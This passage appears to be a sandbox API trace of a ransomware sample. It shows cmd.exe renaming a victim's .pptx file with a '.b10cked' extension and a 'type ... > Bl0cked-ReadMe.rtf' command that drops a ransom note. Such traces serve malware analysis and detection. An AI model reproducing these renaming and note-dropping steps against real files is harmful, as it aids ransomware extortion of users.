lpCPInfo=0x4a9e4260) returned 1 [0231.979] GetUserDefaultLCID () returned 0x409 [0231.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f780, cchData=128 | out: lpLCData="0") returned 2 [0231.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f780, cchData=128 | out: lpLCData="0") returned 2 [0231.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f780, cchData=128 | out: lpLCData="1") returned 2 [0231.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.990] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.990] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.990] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.991] GetConsoleTitleW (in: lpConsoleTitle=0x1d0980, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.024] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.024] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.024] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.024] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.025] _wcsicmp (_String1="move", _String2=")") returned 68 [0232.025] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0232.025] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0232.025] _wcsicmp (_String1="IF", _String2="move") returned -4 [0232.026] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0232.026] _wcsicmp (_String1="REM", _String2="move") returned 5 [0232.026] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0232.032] GetConsoleTitleW (in: lpConsoleTitle=0x18f478, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.085] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0232.085] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0232.085] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0232.085] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0232.086] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0232.086] _wcsicmp (_String1="move", _String2="CD") returned 10 [0232.086] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0232.086] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0232.086] _wcsicmp (_String1="move", _String2="REN") returned -5 [0232.086] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0232.086] _wcsicmp (_String1="move", _String2="SET") returned -6 [0232.086] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0232.086] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0232.086] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0232.086] _wcsicmp 
(_String1="move", _String2="PROMPT") returned -3 [0232.086] _wcsicmp (_String1="move", _String2="MD") returned 11 [0232.086] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0232.086] _wcsicmp (_String1="move", _String2="RD") returned -5 [0232.086] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0232.086] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0232.086] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0232.086] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0232.086] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0232.086] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0232.086] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0232.086] _wcsicmp (_String1="move", _String2="VER") returned -9 [0232.086] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0232.086] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0232.086] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0232.086] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0232.086] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0232.086] _wcsicmp (_String1="move", _String2="START") returned -6 [0232.086] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0232.086] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0232.086] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0232.088] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.088] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.088] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f234, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f22c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f22c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", 
_MaxCount=0x7) returned 38 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.089] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 
[0232.090] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0232.090] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0232.091] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0232.091] _wcsicmp (_String1="IYDSDI~1.PPT", _String2=".") returned 59 [0232.091] _wcsicmp (_String1="IYDSDI~1.PPT", _String2="..") returned 59 [0232.091] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1\\iydsdi~1.ppt")) returned 0x20 [0232.091] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1e2198 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.091] SetErrorMode (uMode=0x0) returned 0x0 [0232.092] SetErrorMode (uMode=0x1) returned 0x0 [0232.092] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT", nBufferLength=0x104, lpBuffer=0x18ebbc, lpFilePart=0x18eba4 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT", lpFilePart=0x18eba4*="IYDSDI~1.PPT") returned 0x51 [0232.092] SetErrorMode (uMode=0x0) returned 0x1 [0232.092] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1")) returned 0x10 [0232.092] _wcsicmp (_String1="IYDSDI~1.PPT", _String2=".") returned 59 [0232.092] _wcsicmp (_String1="IYDSDI~1.PPT", _String2="..") returned 59 [0232.092] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1\\iydsdi~1.ppt")) returned 0x20 [0232.092] SetErrorMode (uMode=0x0) returned 0x0 [0232.092] SetErrorMode (uMode=0x1) returned 0x0 [0232.092] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT", nBufferLength=0x104, lpBuffer=0x18f038, lpFilePart=0x18edd0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT", lpFilePart=0x18edd0*="IYDSDI~1.PPT") returned 0x51 [0232.092] SetErrorMode (uMode=0x0) returned 0x1 [0232.092] SetErrorMode (uMode=0x0) returned 0x0 [0232.093] SetErrorMode (uMode=0x1) returned 0x0 [0232.093] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x18f240, lpFilePart=0x18edd0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked", lpFilePart=0x18edd0*="iyDSdIsdd3hcv.pptx.b10cked") returned 0x5f [0232.093] SetErrorMode (uMode=0x0) returned 0x1 [0232.093] SetLastError (dwErrCode=0x0) [0232.093] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1\\iydsdisdd3hcv.pptx.b10cked")) returned 0xffffffff [0232.093] 
GetLastError () returned 0x2 [0232.093] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x18e74c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e74c) returned 0x1e23a8 [0232.093] FindNextFileW (in: hFindFile=0x1e23a8, lpFindFileData=0x18e74c | out: lpFindFileData=0x18e74c) returned 0 [0232.094] GetLastError () returned 0x12 [0232.094] FindClose (in: hFindFile=0x1e23a8 | out: hFindFile=0x1e23a8) returned 1 [0232.096] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x1e1f38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1e1f38) returned 0x1d0f68 [0232.096] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x18e9e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked", lpFilePart=0x0) returned 0x5f [0232.096] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx", nBufferLength=0x104, lpBuffer=0x18e9e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx", lpFilePart=0x0) returned 0x57 [0232.096] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1\\iydsdisdd3hcv.pptx")) returned 0x20 [0232.096] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx" (normalized: 
"c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1\\iydsdisdd3hcv.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1\\iydsdisdd3hcv.pptx.b10cked"), dwFlags=0x3) returned 1 [0232.097] FindClose (in: hFindFile=0x1d0f68 | out: hFindFile=0x1d0f68) returned 1 [0232.097] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e998 | out: _Buffer=" 1") returned 9 [0232.097] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.097] GetFileType (hFile=0x7) returned 0x2 [0232.144] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e924 | out: lpMode=0x18e924) returned 1 [0232.145] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.145] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e958 | out: lpConsoleScreenBufferInfo=0x18e958) returned 1 [0232.147] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0232.148] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e998 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0232.148] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e97c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e97c*=0x1a) returned 1 [0232.151] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.151] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.174] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.174] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.175] 
_get_osfhandle (_FileHandle=0) returned 0x3 [0232.175] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.176] SetConsoleInputExeNameW () returned 0x1 [0232.176] GetConsoleOutputCP () returned 0x1b5 [0232.177] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.177] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.192] exit (_Code=0) Process: id = "620" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16780" os_pid = "0xfcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34475 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34476 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34477 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34478 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 34479 start_va = 
0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34480 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34481 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34482 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34483 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 34484 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34609 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34610 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34611 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34612 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 34613 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 34614 start_va = 0x6ee80000 end_va = 
0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34615 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34616 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34617 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34618 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34619 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34620 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34621 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34622 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34709 start_va = 0x1e0000 end_va = 0x2a7fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 34710 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34711 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34712 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 34713 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 34714 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 34715 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 34716 start_va = 0x3d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 34717 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 34718 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 860 os_tid = 0x9f0 [0231.872] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fa34 | out: lpSystemTimeAsFileTime=0x16fa34*(dwLowDateTime=0xbdc1bba0, dwHighDateTime=0x1d440a9)) [0231.872] GetCurrentProcessId () returned 0xfcc [0231.872] GetCurrentThreadId () returned 0x9f0 [0231.872] GetTickCount () returned 0x3fcd4 [0231.872] QueryPerformanceCounter (in: 
lpPerformanceCount=0x16fa2c | out: lpPerformanceCount=0x16fa2c*=28866384816) returned 1 [0231.875] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.875] __set_app_type (_Type=0x1) [0231.876] __p__fmode () returned 0x76b331f4 [0231.876] __p__commode () returned 0x76b331fc [0231.876] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.876] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.876] GetCurrentThreadId () returned 0x9f0 [0231.876] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9f0) returned 0x38 [0231.876] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.876] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.876] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.921] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.921] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f9c4 | out: phkResult=0x16f9c4*=0x0) returned 0x2 [0231.921] VirtualQuery (in: lpAddress=0x16f9fb, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.921] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.921] 